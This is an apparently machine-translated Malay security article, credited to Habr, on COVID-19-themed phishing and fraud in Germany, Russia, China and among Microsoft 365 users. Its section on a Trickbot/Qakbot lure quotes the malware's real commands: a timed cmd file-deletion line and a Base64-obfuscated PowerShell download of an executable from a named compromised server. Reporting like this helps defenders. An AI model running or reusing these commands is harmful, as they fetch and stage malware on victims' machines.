Penyerang terus mengeksploitasi topik COVID-19, mewujudkan lebih banyak ancaman bagi pengguna yang sangat berminat dengan semua perkara yang berkaitan dengan wabak itu. DALAM Kami telah bercakap tentang jenis perisian hasad yang muncul berikutan coronavirus, dan hari ini kami akan bercakap tentang teknik kejuruteraan sosial yang telah ditemui oleh pengguna di negara yang berbeza, termasuk Rusia. Aliran dan contoh umum adalah di bawah pemotongan.
Ingat dalam Kami bercakap tentang fakta bahawa orang sanggup membaca bukan sahaja tentang coronavirus dan perjalanan wabak, tetapi juga tentang langkah sokongan kewangan? Berikut adalah contoh yang baik. Serangan pancingan data yang menarik ditemui di negeri Rhine-Westphalia Utara atau NRW, Jerman. Penyerang mencipta salinan laman web Kementerian Ekonomi (), di mana sesiapa sahaja boleh memohon bantuan kewangan. Program sebegini sebenarnya wujud, dan ternyata memberi manfaat kepada penipu. Setelah menerima data peribadi mangsa mereka, mereka membuat permohonan di laman web kementerian sebenar, tetapi menunjukkan butiran bank lain. Menurut data rasmi, 4 ribu permintaan palsu itu dibuat sehingga skim itu ditemui. Akibatnya, $109 juta yang ditujukan untuk warga yang terjejas jatuh ke tangan penipu.
Adakah anda mahukan ujian percuma untuk COVID-19?
Satu lagi contoh pancingan data bertema coronavirus yang ketara ialah dalam e-mel. Mesej itu menarik perhatian pengguna dengan tawaran untuk menjalani ujian percuma untuk jangkitan coronavirus. Dalam lampiran ini terdapat contoh Trickbot/Qakbot/Qbot. Dan apabila mereka yang ingin memeriksa kesihatan mereka mula "mengisi borang yang dilampirkan", skrip berniat jahat telah dimuat turun ke komputer. Dan untuk mengelakkan ujian kotak pasir, skrip mula memuat turun virus utama hanya selepas beberapa ketika, apabila sistem perlindungan yakin bahawa tiada aktiviti berniat jahat akan berlaku.
Meyakinkan kebanyakan pengguna untuk mendayakan makro juga mudah. Untuk melakukan ini, helah standard telah digunakan: untuk mengisi soal selidik, anda perlu mendayakan makro terlebih dahulu, yang bermaksud anda perlu menjalankan skrip VBA.
Seperti yang anda lihat, skrip VBA disembunyikan khas daripada antivirus.
Windows mempunyai ciri tunggu di mana aplikasi menunggu /T <saat> sebelum menerima jawapan lalai "Ya". Dalam kes kami, skrip menunggu 65 saat sebelum memadamkan fail sementara:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Dan sementara menunggu, perisian hasad telah dimuat turun. Skrip PowerShell khas telah dilancarkan untuk ini:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Selepas menyahkod nilai Base64, skrip PowerShell memuat turun pintu belakang yang terletak pada pelayan web yang digodam sebelum ini dari Jerman:
http://automatischer-staubsauger.com/feature/777777.pngdan menyimpannya di bawah nama:
C:UsersPublictmpdirfile1.exe
Folder βC:UsersPublictmpdirβ dipadamkan apabila menjalankan fail 'tmps1.bat' yang mengandungi arahan cmd /c mkdir ""C:UsersPublictmpdir"".
Serangan yang disasarkan ke atas agensi kerajaan
Selain itu, penganalisis FireEye baru-baru ini melaporkan serangan APT32 yang disasarkan yang ditujukan kepada struktur kerajaan di Wuhan, serta Kementerian Pengurusan Kecemasan China. Salah satu RTF yang diedarkan mengandungi pautan ke artikel New York Times bertajuk . Walau bagaimanapun, apabila membacanya, perisian hasad telah dimuat turun (Penganalisis FireEye mengenal pasti contoh itu sebagai METALJACK).
Menariknya, pada masa pengesanan, tiada antivirus yang mengesan kejadian ini, menurut Virustotal.
Apabila laman web rasmi tidak berfungsi
Contoh paling ketara serangan pancingan data berlaku di Rusia pada hari yang lain. Sebabnya adalah pelantikan faedah yang ditunggu-tunggu untuk kanak-kanak berumur 3 hingga 16 tahun. Apabila permulaan penerimaan permohonan diumumkan pada 12 Mei 2020, berjuta-juta bergegas ke tapak web Perkhidmatan Negeri untuk mendapatkan bantuan yang telah lama ditunggu-tunggu dan menurunkan portal itu tidak lebih teruk daripada serangan DDoS profesional. Apabila presiden berkata bahawa "Perkhidmatan Kerajaan tidak dapat menampung aliran permohonan," orang ramai mula bercakap dalam talian tentang pelancaran tapak alternatif untuk menerima permohonan.
Masalahnya ialah beberapa tapak mula berfungsi serentak, dan sementara satu, yang sebenar di posobie16.gosuslugi.ru, sebenarnya menerima permohonan, lebih .
Rakan sekerja dari SearchInform menemui kira-kira 30 domain penipuan baharu dalam zon .ru. Syarikat Infosecurity dan Softline telah menjejaki lebih 70 tapak web perkhidmatan kerajaan palsu yang serupa sejak awal April. Pencipta mereka memanipulasi simbol biasa dan juga menggunakan gabungan perkataan gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie dan sebagainya.
Hype dan kejuruteraan sosial
Semua contoh ini hanya mengesahkan bahawa penyerang berjaya mengewangkan topik coronavirus. Dan semakin tinggi ketegangan sosial dan semakin banyak isu yang tidak jelas, semakin banyak peluang penipu untuk mencuri data penting, memaksa orang ramai melepaskan wang mereka sendiri atau hanya menggodam lebih banyak komputer.
Dan memandangkan wabak itu telah memaksa orang yang berpotensi tidak bersedia untuk bekerja dari rumah secara beramai-ramai, bukan sahaja peribadi, tetapi juga data korporat berisiko. Sebagai contoh, baru-baru ini pengguna Microsoft 365 (dahulunya Office 365) turut mengalami serangan pancingan data. Orang ramai menerima mesej suara "rindu" besar-besaran sebagai lampiran pada surat. Walau bagaimanapun, fail tersebut sebenarnya adalah halaman HTML yang menghantar mangsa serangan ke . Akibatnya, kehilangan akses dan menjejaskan semua data daripada akaun.
Sumber: www.habr.com